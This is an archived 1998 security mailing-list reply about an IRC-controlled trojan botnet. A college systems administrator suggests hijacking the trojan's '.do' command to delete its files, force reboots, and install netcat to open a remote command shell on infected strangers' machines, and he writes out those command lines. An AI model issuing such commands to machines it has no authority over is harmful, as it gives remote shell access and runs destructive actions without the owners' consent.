|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re: Internet Wide DOS Attack using IRC
George Imburgia (gti
HOPI.DTCC.EDU)Sat, 3 Oct 1998 08:30:08 -0400
- Messages sorted by: [ date ][ thread ][ subject ][ author ]
- Next message: Derek Reynolds: "Re: Internet Wide DOS Attack using IRC (real deal)"
- Previous message: Glenn Tucker: "Re: Internet Wide DOS Attack using IRC"
- In reply to: Samuel Cossette: "Re: Internet Wide DOS Attack using IRC"
- Next in thread: Samuel Cossette: "Re: Internet Wide DOS Attack using IRC"
On Fri, 2 Oct 1998, Samuel Cossette wrote: > When a clone (Havoc call an infected computer a "Drone") is connected on irc > anybody can control this with Private msg command (.join #chan, .part, .do > [raw command]). 2-3 week ago the infected chan get about 500-700 drones > (stable). My personnal estimation of infected computer it's 15000+. With the DO command enabled, they gave us the means to remotely disable this trojan. Something to the effect of; msg <nick> .do del c:\windows\system\oce*.* Then, msg <nick> .do <some evil command to lock up the machine, forcing a reboot>. I'd be happy to write something cleaner and more specific, if someone could forward me a copy of this trojan, or at least a directory listing of the c:\windows\system directory on an infected machine. The mIRC DO command is very powerful, and can be used to install netcat on the remote machine. We could then .msg <nick> <path to netcat>\nc.exe -L -p <any port> <your ip> -t -e command.com, giving a remote command prompt to investigate/disinfect the machine. Anyone with a copy of this, feel free to mail me here, or contact Phatass on EFnet. ______________________________________________________________________________ George Imburgia e-mail: gtihopi.dtcc.edu Systems Administrator Phone: (302)739-4068 Delaware Technical & Community College Fax: (302)739-3345 Office of the President Pager: (302)741-5962
- Next message: Derek Reynolds: "Re: Internet Wide DOS Attack using IRC (real deal)"
- Previous message: Glenn Tucker: "Re: Internet Wide DOS Attack using IRC"
- In reply to: Samuel Cossette: "Re: Internet Wide DOS Attack using IRC"
- Next in thread: Samuel Cossette: "Re: Internet Wide DOS Attack using IRC"